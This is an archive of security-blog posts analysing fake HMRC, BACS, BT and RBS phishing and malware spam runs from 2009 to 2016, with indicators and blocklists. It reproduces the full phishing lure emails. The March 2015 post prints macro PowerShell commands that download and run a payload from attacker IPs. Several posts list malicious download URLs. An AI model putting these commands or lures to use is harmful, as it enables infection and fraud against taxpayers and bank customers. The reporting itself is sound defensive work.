Sponsored by..

Showing posts with label HMRC. Show all posts
Showing posts with label HMRC. Show all posts

Wednesday 16 November 2016

Phishing: "Office 365 Tax Refund Service" / updatemicrosoftonline.com

Microsoft Office 365 offering a tax refund service? Really? No, of course not, it's a phishing scam..

From:    Microsoft Office 365 Team [noreply@cloud.baddogwebdesign.com]
Date:    16 November 2016 at 10:58
Subject:    Office 365 Tax Refund Service

     Office 365 Microsoft


Office 365 Tax Refund Service.
    –
–    

CONFIGURE TODAY

Thanks for using Office 365. We are delighted to present our new service associated with HM Revenue & Customs. To continue processing your tax refund please configure your bank account.

It's easy to configure your bank account:

1     –    

Sign in to your account.
1     –    

Configure your bank account.
1     –    

You are eligible to receive a tax refund of £537.25 GBP

Thanks for subscribing to Office 365. We hope to continue serving you.
    –

–     Helpful resources

How to reactivate your Office 365 subscription
Already renewed? Verify your subscription here
What happens to my data and access when my subscription expires?
Get help and support for Office 365
    –
–    

This is a mandatory service communication. To set your contact preferences for other communications, visit the Promotional Communications Manager.

This message was sent from an unmonitored e-mail address. Please do not reply to this message.
Privacy | Legal
    –
–    

Microsoft Office
One Microsoft Way


The link in the email leads to updatemicrosoftonline.com on 89.248.168.13 (Quasi Networks LTD, Seychelles). Despite the email and the domain name it leads to an HMRC-themed phishing page..

This multi-phish page has twelve UK banks set up on it:

  • Barclays
  • Halifax
  • HSBC
  • Lloyds Bank
  • NatWest
  • Royal Bank of Scotland
  • Santander
  • TSB
  • Metro Bank
  • Clydesdale Bank
  • The Co-Operative Bank
  • Tesco Bank
Clicking on any of the links goes to a pretty convincing looking phish page, personalised for each bank and carefully extracting all the information they need for account theft.  The screenshots below are the sequence if you choose TSB bank.





Once you have entered all the information, the process appears to fail and you are directed to a genuine HMRC site instead.

A list of sites found in 89.248.168.0/24 can be found here [pastebin]. I suggest that the entire network range looks questionable and should be blocked.

Wednesday 22 July 2015

Malware spam: HMRC application with reference XXXX XXXX XXXX XXXX received / noreply@hmrc.gov.uk

These spam emails do not come from HMRC (the UK tax office) but are instead a simple forgery with a malicious attachment.
From:    noreply@hmrc.gov.uk [noreply@hmrc.gov.uk]
Date:    22 July 2015 at 13:19
Subject:    HMRC application with reference 5CSS 1QDX 27KH LRFM received

The application with reference number 5CSS 1QDX 27KH LRFM submitted by you or your agent to register for HM Revenue & Customs (HMRC)  has been received and will now be verified. HMRC will contact you if further information is needed.

The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

Attached is a file 2015_MURI_FOA_ONR_FOA_14-012_FINAL_EGS.doc with a VirusTotal detection rate of 7/55 which if opened (not advised) pretends to be an encrypted document that requires Active Content to be enabled.

According to this Hybrid Analysis report the embedded macro contacts the following hosts to download components:

vinestreetfilms.com/wp-content/plugins/jetpack/_inc/genericons/genericons/rtl/78672738612836.txt
midlandspestcontrol.net/wp-includes/js/tinymce/themes/advanced/skins/o2k7/78672738612836.txt
midlandspestcontrol.net//wp-includes/js/tinymce/themes/advanced/skins/o2k7/fafa.txt

This includes another malicious script. This then leads to the download of a malicious binary from:

anacornel.com/images/desene/united.exe

This has a VirusTotal detection rate of just 2/55. Automated analysis is pending.

MD5s:
605905df205b6c266856990a49abdfef
1fdb0af80d01739410a3eef67c4144ff

UPDATE: a Hybrid Analysis report is here, but it does not add much more detail.

Wednesday 1 July 2015

Malware spam: "Notice of Underreported Income" / "noreply@hmrc.gov.uk"

The second HMRC spam run of the day..

From:    HM Revenue and Customs [noreply@hmrc.gov.uk]
Date:    1 July 2015 at 11:36
Subject:    Notice of Underreported Income

Taxpayer ID: ufwsd-000004152670UK
Tax Type: Income Tax
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax income statement on HM Revenue and Customs ( HMRC ).Download your HMRC statement.
Please complete the form. You can download HMRC Form herc

In this case, the link goes to bahiasteel.com/secure_storage/get_document.html however, the payload is Upatre leading to the Dyre banking trojan, as seen in this other spam run today.

Malware spam: "HMRC taxes application with reference L4TI 2A0A UWSV WASP received" / "noreply@taxreg.hmrc.gov.uk"

This fake tax spam leads to malware:

From     "noreply@taxreg.hmrc.gov.uk" [noreply@taxreg.hmrc.gov.uk]
Date     Wed, 1 Jul 2015 11:20:37 +0000
Subject     HMRC taxes application with reference L4TI 2A0A UWSV WASP received

The application with reference number L4TI 2A0A UWSV WASP submitted by you or your
agent to register for HM Revenue & Customs (HMRC) taxes has been received and will
now be verified. HMRC will contact you if further information is needed.

Please download/view your HMRC documents here: http://quadroft.com/secure_storage/get_document.html

The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate
Number 2009/09/0052.) On leaving the GSi this email was certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded
for legal purposes.d

If you have the correct browser agent (e.g. Internet Explorer 8 on Windows) you will see a "Your document will download shortly.." notice. If you have something else, a fake 404 page will be generated.
The page then forwards to the real HMRC login page but attempts to dump a malicious ZIP from another source at the same time.

In this case, the ZIP file was Document_HM901417.zip which contains a malicious executable Document_HM901417.exe. This has a VirusTotal detection rate of 3/55 (identified as the Upatre downloader).

Automated analysis [1] [2] [3] shows attempted traffic to 93.185.4.90 (C2NET, Czech Republic) and a dropped executable with a random name and an MD5 of ba841ac5f7500b6ea59fcbbfd4d8da32 with a detection rate of 2/55.

The payload is almost definitely the Dyre banking trojan.

Wednesday 11 March 2015

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177



Friday 26 September 2014

Malware spam: "HMRC taxes application with reference" / "Important - BT Digital File" / RBS "Outstanding invoice"

Another bunch of spam emails, with the same payload at this earlier spam run.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received

From:     noreply@taxreg.hmrc.gov.uk [noreply@taxreg.hmrc.gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received

The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.

Please download/view your HMRC documents here: http://motobrothers.com.pl/documents/document26092014-008.php

The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

Important - BT Digital File


From:     Cory Sylvester [Cory.Sylvester@bt.com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File

Dear Customer,

This email contains your BT Digital File. Please scan attached file and reply to this email.

To download your BT Digital File please follow the link below : http://splash.com.my/documents/document26092014-008.php

If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 0346* between 8am and midnight.

Thank you for choosing BT Digital Vault.

Kind regards,
BT Digital Vault Team
footer

*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.

Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.

This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.

Registered office: 81 Newgate Street London EC1A 7AJ Registered in England no: 1800000

RBS Bankline: Outstanding invoice


From:     Bankline.Administrator@rbs.co.uk [Bankline.Administrator@rbs.co.uk]
To:     redacted.uk
Date:     26 September 2014 13:05
Subject:     Outstanding invoice

   {_BODY_TXT}

Dear [redacted],

Please find the attached copy invoice which is showing as unpaid on our ledger.

To download your invoice please click here

I would be grateful if you could look into this matter and advise on an expected payment date .

Many thanks

Paul Hamilton

Credit Control

Tel: 0845 300 2952
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload as earlier.

The links I have seen so far in the emails are:

http://motobrothers.com.pl/documents/document26092014-008.php
http://splash.com.my/documents/document26092014-008.php
http://www.firstlcoc.org/documents/document26092014-008.php
http://elblogderosner.com/documents/document26092014-008.php

Friday 25 July 2014

HM Revenue and Customs "Notice of Underreported Income" spam

The second HMRC spam run of the day, this one contains a malicious link.
From:     HM Revenue and Customs [noreply@hmrc.gov.uk]
Reply-To:     HM Revenue and Customs [noreply@hmrc.gov.uk]
Date:     25 July 2014 12:19
Subject:     Notice of Underreported Income

Taxpayer ID: ufwsd-000007954108UK
Tax Type: Income Tax
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax income statement on HM Revenue and Customs ( HMRC ).Download your HMRC statement.
Please complete the form. You can download HMRC Form here.
In this case the link in the email goes to ecanovas.com/boceto/hmrc.exe which the user is expected to download and run. It has a VirusTotal detection rate of 3/51. Automated analysis tools are pretty inconclusive [1] [2] [3] but do reveal some of the behavioural activity.

HMRC "Tax Notice July 2014" spam

This fake HMRC tax notice comes with a malicious attachment:

Date:      Fri, 25 Jul 2014 16:48:37 +0900 [03:48:37 EDT]
From:      HMRC Revenue&Customs [Rosanne@hmrc.gov.uk]
Reply-To:      Legal Aid Agency [re-HN-WFCLL-OECGTZ@hmrc.gov.uk]


Dear [redacted] ,

Please be advised that one or more Tax Notices (P6, P6B) have been issued.

For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 34320-289.



The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
2014 © All rights reserved

Attached is a file P6_rep_34320-289.zip which unZips to a folder called P6_rep(9432)_84632_732.doc which contains a malicious executable P6_rep(9432)_84632_732.doc.scr which has a VirusTotal detection rate of 4/53.

The CAMAS report shows that a second component is downloaded from 37.139.47.167/bt/2.exe which in turn has a VirusTotal detection rate of 5/52.


The IP address of 37.139.47.167 is in the same /24 as the two other IPs mentioned here. I would very strongly recommend blocking traffic to at least 37.139.47.0/24 or the whole 37.139.40.0/21 range (although there do seem to be some legitimate Russian-language sites in there). The IP belongs to:

inetnum:        37.139.40.0 - 37.139.47.255
netname:        COMFORTEL-NET
descr:          COMFORTEL ltd.
country:        RU
admin-c:        ME3174-RIPE
tech-c:         RASS-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-routes:     MNT-PIN
mnt-domains:    PIRIX-MNT
source:         RIPE # Filtered

person:         Mikhail Evdokimov
address:        PIRIX
address:        Obukhovskoy Oborony, 120-Z
address:        192012, St.Petersburg
address:        Russia
phone:          +7 812 3343610
fax-no:         +7 812 6002014
nic-hdl:        ME3174-RIPE
mnt-by:         RUNNET-MNT
source:         RIPE # Filtered

person:         Dmitry Rassohin
address:        194156, St.Petersburg, Russia
address:        Bolshoy Sampsonievskiy prospekt 106A, apt. 304
phone:          +7 931 2700021
nic-hdl:        RASS-RIPE
mnt-by:         RASS-MNT
source:         RIPE # Filtered

route:          37.139.40.0/21
descr:          PIRIXROUTE
origin:         AS56534
mnt-by:         MNT-PIN
source:         RIPE # Filtered

Friday 9 May 2014

HMRC spam / VAT0781569.zip

This fake HMRC spam comes with a malicious attachment:

Date:      Fri, 9 May 2014 12:47:49 +0530 [03:17:49 EDT]
From:      "noreply@hmrc.gov.uk" [noreply@hmrc.gov.uk]
Subject:      Successful Receipt of Online Submission for Reference 0781569


Thank you for sending your VAT Return online. The submission for reference 0781569 was
successfully received on Fri, 9 May 2014 12:47:49 +0530  and is being processed. Make VAT
Returns is just one of the many online services we offer that can save you time and
paperwork.

For the latest information on your VAT Return please open attached report.

The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Cable&Wireless Worldwide in partnership with
MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was
certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for
legal purposes. 

It says "On leaving the GSi this email was certified virus free" which (as you might suspect) is utter bollocks, because it comes with a malicious payload. Attached to the message is an archive VAT0781569.zip which in turn contains two identical malicious executables AccountDocuments.scr and VAT090514.scr which have a VirusTotal detection rate of 15/52.


This is part one of the infection chain. Automated analysis [1] [2] [3] shows that components are then downloaded from the following locations:

[donotclick]bmclines.com/0905UKdp.rar
[donotclick]gamesofwar.net/img/icons/0905UKdp.rar
[donotclick]entslc.com/misc/farbtastic/heap170id3.exe
[donotclick]distrioficinas.com/css/b01.exe


The malicious binary heap170id3.exe has a VirusTotal detection rate of 9/52. Automated analysis [1] [2] shows that this makes a connection to a server at 94.23.32.170 (OVH, France).

The other malicious binary, b01.exe had a VirusTotal detection rate of 11/52. Analysis of this shows [1] [2] that it attempts to connect to several different email services, presumably to send out spam.

Tuesday 25 March 2014

"You have received new messages from HMRC" spam

This fake HMRC spam comes with a malicious attachment:

Date:      Tue, 25 Mar 2014 12:59:28 +0100 [07:59:28 EDT]
From:      "noreply@hmrc.gov.uk" [noreply@hmrc.gov.uk]
Subject:      You have received new messages from HMRC

Please be advised that one or more Tax Notices (P6, P6B) have been issued.

For the latest information on your Tax Notices (P6, P6B) please open attached report.

Please do not reply to this e-mail.

1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system. 2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices. For further details, please visit our website
http://www.qualitysolicitors.com/punchrobson
The attachment is called HMRC_TAX_Notice_rep.zip which in turn contains a malicious exectuable HMRC_TAX_Notice_rep.scr which has a VirusTotal detection rate of 5/51.

According to the Malwr report, the malware makes a download from the following locations hosted on 67.205.16.21 (New Dream Network, US):
[donotclick]sandsca.com.au/directions/2503UKp.tis
[donotclick]www.sandsca.com.au/directions/2503UKp.tis

Subsequent communications are made with aulbbiwslxpvvphxnjij.biz on the familiar looking Linode IP of 50.116.4.71, and also qkdapcqinizsczxrwaelaimznfbqq.biz on another Linode IP of 178.79.178.243. An attempt it also made to connect to hzdmjjneyeuxkpzkrunrgyqgcukf.org which does not resolve.

One odd thing in the Anubis report is this dialog box entititled "seconddial" and containing the word "diminutiveness".


I don't know what that is.. it reminds me of Hatefulness/Hatefulness though :)

Recommended blocklist:
50.116.4.71
178.79.178.243
sandsca.com
aulbbiwslxpvvphxnjij.biz
qkdapcqinizsczxrwaelaimznfbqq.biz
hzdmjjneyeuxkpzkrunrgyqgcukf.org

Thursday 6 February 2014

Fake HMRC "VAT Return" spam

This fake HMRC spam comes with a malicious attachment:

Date:      Thu, 6 Feb 2014 20:32:34 +0100 [14:32:34 EST]
From:      "noreply@hmrc.gov.uk" [noreply@hmrc.gov.uk]
Subject:      Successful Receipt of Online Submission for Reference 3608005

Thank you for sending your VAT Return online. The submission for reference 3608005 was
successfully received on Thu, 6 Feb 2014 20:32:34 +0100  and is being processed. Make VAT
Returns is just one of the many online services we offer that can save you time and
paperwork.

For the latest information on your VAT Return please open attached report.

The original of this email was scanned for viruses by the Government Secure Intranet
virus scanning service supplied by Cable&Wireless Worldwide in partnership with
MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was
certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for
legal purposes.
I love the "certified virus-free" bit, because of course this thing comes with a malicious payload. Attached to the message is an archive Reference.zip which in turn contains a malicious executable Reference.scr (a plain old executable, not a screensaver). This has a VirusTotal detection rate of 2/50.

Automated analysis tools [1] [2] [3] [4] show an encrypted file being downloaded from:
[donotclick]wahidexpress.com/scripts/ie.enc[donotclick]bsitacademy.com/img/events/ie.enc

Recommended blocklist:
182.18.188.191
wahidexpress.com
bsitacademy.com

Update:
second version of the email is circulating with the following body text:

The submission for reference 485/GB1392709 was successfully received and was not
processed.

Check attached copy for more information.

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.

Tuesday 12 November 2013

"You have received new messages from HMRC" spam, HMRC_Message.zip and qualitysolicitors.com

This fake HMRC spam comes with a malicious attachment. Because the spammers have copied-and-pasted the footer from somewhere random it also effectively joe jobs an innocent site called qualitysolicitors.com:

Date:      Tue, 12 Nov 2013 05:29:28 -0500 [05:29:28 EST]
From:      "noreply@hmrc.gov.uk" [noreply@hmrc.gov.uk]
Subject:      You have received new messages from HMRC

Please be advised that one or more Tax Notices (P6, P6B) have been issued.

For the latest information on your Tax Notices (P6, P6B) please open attached report.

Please do not reply to this e-mail.

1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system. 2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices. For further details, please visit our website
http://www.qualitysolicitors.com/punchrobson
Perhaps the spammers were as irritated by the overblown mail footer as I was. Anyway, there's a ZIP file called HMRC_Message.zip which in turn contains a malicious executable HMRC_Message.exe which has a VirusTotal detection rate of 12/47.

Automated analysis tools [1] [2] show that it attempts to communicate with alibra.co.uk  on 78.137.113.21 (UKfastnet Ltd, UK) and then it attempts to download additional components from:

[donotclick]synchawards.com/a1.exe
[donotclick]itcbadnera.org/images/dot.exe

a1.exe has a detection rate of 16/47, and Malwr reports further HTTP connections to:
[donotclick]59.106.185.23/forum/viewtopic.php
[donotclick]new.data.valinformatique.net/5GmVjT.exe
[donotclick]hargobindtravels.com/38emc.exe
[donotclick]bonway-onza.com/d9c9.exe
[donotclick]friseur-freisinger.at/t5krH.exe

dot.exe has a much lower detection rate of 6/47, ThreatExpert, ThreatTrack [pdf] and Malwr report various types of activity including keylogging and credential harvesting. There are also many, many HTTP connections to various hosts, I suspect this is attempting to mask the actual C&C servers it is connecting to.

a1.exe downloads several more files, all of which appear to be the same. The VirusTotal detection rate for these is 5/47, Malwr reports several attempted IP connections that look a bit like peer-to-peer Zeus.

Recommended blocklist:
59.106.185.23
new.data.valinformatique.net
hargobindtravels.com
bonway-onza.com
friseur-freisinger.at
synchawards.com
itcbadnera.org
alibra.co.uk


Thursday 16 May 2013

HMRC spam / VAT Returns Repot 517794350.doc

This fake HMRC (UK tax authority) spam contains a malicious attachment:

From: noreply@hmrc.gov.uk [mailto:noreply@hmrc.gov.uk]
Sent: 16 May 2013 10:48
Subject: Successful Receipt of Online Submission for Reference 517794350


Thank you for sending your VAT Return online. The submission for reference 517794350 was successfully received on 2013-05-16 T10:45:27 and is being processed. Make VAT Returns is just one of the many online services we offer that can save you time and paperwork.

For the latest information on your VAT Return please open attached report.

The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Cable&Wireless Worldwide in partnership with MessageLabs. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.

Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.

The attachment is VAT Returns Repot 517794350.doc which contains an exploit which is currently being analysed. It is likely to use the same vulnerability as this attack. VirusTotal results are just 1/46, so either this is something completely new or it is a corrupt sample.

UPDATE: ThreatTrack reports that the malware sample appears to make contact with the following IPs which are all dynamic IP addresses, indicating perhaps a P2P version of Zeus:
62.103.27.242
76.245.44.216
86.124.111.218
92.241.139.165
122.179.128.38
189.223.139.172
190.42.161.35

Monday 22 August 2011

HMRC phish: refund1-hmrc.com, refund2-hmrc.com, refund3-hmrc.com and refund4-hmrc.com

Here's a bunch of web sites and domains being used to peddle fake HMRC (UK tax office) refunds:

www.refund1-hmrc.com
www.refund2-hmrc.com
www.refund3-hmrc.com
www.refund4-hmrc.com
www.handler123.com

The fake emails look something like this:

From: HM Revenue & Customs Billing Department [mailto:hmrc@refund1-hmrc.com]
Sent: 22 August 2011 09:36
To: [redacted]
Subject: Billing Notifcation


Refund Notification


This e-mail has been sent to you by HM Revenue & Customs to inform you that we must pay you back 478 GBP.
Please complete all the information to process your refund

Please allow 2 weeks for you money to be availabe in your account. (eg: address, phone)
Total refund amount: 478 GBP

To ensure that your service is not interrupted, we request you to confirm and update your information today by following the link below:

Refund Notification


Thank you for your prompt attention to this matter. Do not reply to this e-mail.
Mail sent to this address cannot be answered.

Member [redacted]

© HM Revenue & Customs 2011 

The emails actually come from  refund1-hmrc.com, refund2-hmrc.com, refund3-hmrc.com and refund4-hmrc.com so

If you click through the link then you get a pretty standard phishing page trying to get credit card details, personal information and passwords.

The HMRC don't send tax refund messages by email, so any such notification should be considered bogus.

The phishing sites are hosted on 211.154.91.246 in China, blocking that IP would be a good idea, but you could go further and block 211.154.64.0/19 as it looks like a cable modem range and there shouldn't really be any legitimate sites hosted here.

Domain registration details are clearly fake:


Domain Name.......... refund1-hmrc.com
  Creation Date........ 2011-08-22
  Registration Date.... 2011-08-22
  Expiry Date.......... 2012-08-22
  Organisation Name.... scotia bank
  Organisation Address. hah
  Organisation Address.
  Organisation Address. there
  Organisation Address. 123131
  Organisation Address. AL
  Organisation Address. UNITED STATES

Admin Name........... scotia bank
  Admin Address........ hah
  Admin Address........
  Admin Address........ there
  Admin Address........ 123131
  Admin Address........ AL
  Admin Address........ UNITED STATES
  Admin Email.......... bbuubbh2@yahoo.com
  Admin Phone.......... +1.1233213121
  Admin Fax............

Tech Name............ scotia bank
  Tech Address......... hah
  Tech Address.........
  Tech Address......... there
  Tech Address......... 123131
  Tech Address......... AL
  Tech Address......... UNITED STATES
  Tech Email........... bbuubbh2@yahoo.com
  Tech Phone........... +1.1233213121
  Tech Fax.............
  Name Server.......... ns1.refund1-hmrc.com
  Name Server.......... ns2.refund1-hmrc.com



The nameservers are hosted on 200.29.238.90 in Colombia (CONSULNETWORK LTDA).

Tuesday 12 July 2011

Fake HMRC site: confirm-hmrc.com / onlineservice.confirm-hmrc.com

This is a rather new phishing site, pretending to be a tax refund from the UK's HMRC agency pointing to the domain confirm-hmrc.com (subdomains www.confirm-hmrc.com and onlineservice.confirm-hmrc.com).

Although the phish looks convincing, the HMRC don't do tax refunds in this way. Usually they will just transfer the money to your bank account or alternatively send you a cheque. Furthermore, in my experience the HMRC only communicate by post and not electronic mail.

The site hosted on 218.108.75.53 in China. The same server also has the fraudulent domains account-update-westernunion.com, account-westernunion.com and accounts-westernunion.com. The domain registration details are fake:

Domain Name.......... confirm-hmrc.com
  Creation Date........ 2011-07-12
  Registration Date.... 2011-07-12
  Expiry Date.......... 2012-07-12
  Organisation Name.... wu wu
  Organisation Address. 12 na
  Organisation Address.
  Organisation Address. miami
  Organisation Address. 12311
  Organisation Address. AL
  Organisation Address. UNITED STATES

Admin Name........... wu wu
  Admin Address........ 12 na
  Admin Address........
  Admin Address........ miami
  Admin Address........ 12311
  Admin Address........ AL
  Admin Address........ UNITED STATES
  Admin Email.......... sadasda@re.com
  Admin Phone.......... +1.12312312312
  Admin Fax............

Tech Name............ wu wu
  Tech Address......... 12 na
  Tech Address.........
  Tech Address......... miami
  Tech Address......... 12311
  Tech Address......... AL
  Tech Address......... UNITED STATES
  Tech Email........... sadasda@re.com
  Tech Phone........... +1.12312312312
  Tech Fax.............
  Name Server.......... ns2.confirm-hmrc.com
  Name Server.......... ns1.confirm-hmrc.com

Blocking traffic to 218.108.75.0/24 will probably do no harm.

Thursday 10 September 2009

Fake HMRC tax refund messages

Looks like there's a spam run in progress with the following fake tax refund message:
From: HM Revenue & Customs [mailto:rsa.messages@hmrc.rsamessages.co.uk]
Sent: 10 September 2009 10:16
Subject: [ HMRC MESSAGE ID NUMBER: 381716209 ]

(This is an outbound message only. Please do not reply.)



Dear Applicant,

The contents of this email and any attachments are confidential and as applicable, copyright in these is reserved to HM Revenue & Customs. Unless expressly authorised by us, any further dissemination or distribution of this email or its attachments is prohibited.

If you are not the intended recipient of this email, please reply to inform us that you have received this email in error and then delete it without retaining any copy.

I'm writing to confirm that after the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 327.54 GBP

You have attached the tax return form with the TAX REFUND NUMBER ID: 381716209, complete the tax return form attached to this message.

After completing the form, please submit the form by clicking the SUBMIT button on form and allow us 5-9 business days in order to process it.

If you have any questions, please refer to our Frequently Asked Questions (FAQs) or visit our head office address can be found on our web site at http://www.hmrc.co.uk/

Yours sincerely,
Kevin Taylor
Manager, HM Revenue & Customs Tax Credit

TAX RETURN FOR THE YEAR 2009
RECALCULATION OF YOUR TAX REFUND
HMRC 2008-2009
LOCAL OFFICE No. 3819
TAX CREDIT OFFICER: Kevin Taylor
TAX REFUND ID NUMBER: 381716209
REFUND AMOUNT: 327.54 GBP


This e-mail is generated by RSA Security United Kingdom on behalf of HM Renenue & Customs


Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.


or another variant:


From: HM Revenue & Customs [mailto:officer.robinson@hmrc.co.uk]
Sent: 10 September 2009 10:23
Subject: TAX REFUND ID NUMBER: 381716209

TAX RETURN FOR THE YEAR 2009

